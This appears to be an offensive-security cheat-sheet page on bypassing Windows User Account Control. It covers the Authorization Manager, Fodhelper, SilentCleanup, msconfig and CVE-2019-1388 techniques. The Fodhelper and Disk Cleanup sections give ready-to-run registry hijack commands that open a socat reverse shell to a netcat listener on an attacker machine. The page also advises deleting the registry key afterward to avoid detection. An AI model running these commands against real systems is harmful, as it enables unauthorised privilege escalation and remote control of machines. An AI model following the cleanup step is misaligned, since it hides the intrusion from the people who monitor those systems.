UAC Windows Privilege Escalation

Last modified: Wed Dec 06 2023 00:00:00 GMT+0000 (Coordinated Universal Time)

Windows

UAC (User Account Control) is an access control enforcement feature.

Automation

UACME is an automation tool for defeating Windows UAC.


Investigation

# Check the current user's integrity level
whoami /groups | findstr "Label"
whoami /groups | find "Label"

UAC Bypass

AZMAN.MSC (Authorization Manager)

  1. Open AZMAN.MSC by entering “azman.msc” in the Run.
  2. Click Help and select Help Topics. The MMC window will open.
  3. In the MMC window, right-click and select View Source. The Notepad opens.
  4. In the Notepad, select File → Open.
  5. then click Open. Command Prompt will open.
  6. In Command Prompt, we should escalate to High integrity level. For instance, try cd C:\Users\Administrator command. We may be able to access this directory even if we’re not Administrator.
  7. In Explorer, select Windows/System32/cmd.exe and right-click, then select Open.
  8. We should escalate to High integrity level.

Fodhelper (Features on Demand Helper)

Fodhelper manages the Windows features settings.

First start listener in local machine for getting incoming connection.

nc -lvnp 4444

In remote Windows machien, add subkey to the registry and execute fodhelper to reverse shell.

set REG_KEY=HKCU\Software\Classes\ms-settings\Shell\Open\command
set CMD="powershell -windowstyle hidden C:\socat.exe TCP:<local-ip>:4444 EXEC:cmd.exe,pipes"
# /v: Value name under the selected key.
# /d: Data to assign to the registry ValueName being added.
# /f: Force overwriting the existing registry entry without prompt.
reg add %REG_KEY% /v "DelegateExecute" /d "" /f
reg add %REG_KEY% /d %CMD% /f & fodhelper.exe

We should get a shell and elevate High integrity level.

To check the IL, run the following command.

whoami /groups | find "Label"

Finally, we need to clear the above settings to avoid detection.

# /f: Forces the deletion without prompt
reg delete HKCU\Software\Classes\ms-settings\ /f

Scheduled Task: Disk Cleanup

Start listener for getting reverse connection in local machine.

nc -lvnp 4444

Add the entry to registry to reverse shell.


reg add "HKCU\Environment" /v "windir" /d "cmd.exe /c C:\socat.exe TCP:<local-ip>:4444 EXEC:cmd.exe,pipes &REM " /f
# /run: Start the scheduled tasks immediately.
# /tn: Task name
# /I: Idle time
schtasks /run  /tn \Microsoft\Windows\DiskCleanup\SilentCleanup /I

System Configuration (msconfig)

  1. Open System Configuration by entering "msconfig" in the Run.
  2. Go to Tools tab and select Command Prompt, then click Launch.
  3. We should escalate to High integrity level.

Abuse UAC Windows Certificate Dialog (CVE-2019-1388)

UAC Windows Certificate Dialog is vulnerable to privilege escalation.

  1. Open hhupd.exe. The User Account Control window opens.

  2. Click the "Show more details" and click also "Show information about the publisher’s certificate".

  3. Now click the "Issued by" link. Web browser will open.

  4. In web browser, select Tools -> File -> Save as....

  5. On the explorer window address path, enter the cmd.exe full path as below:

    "c:\Windows\System32\cmd.exe"

Now we escalated the privilege.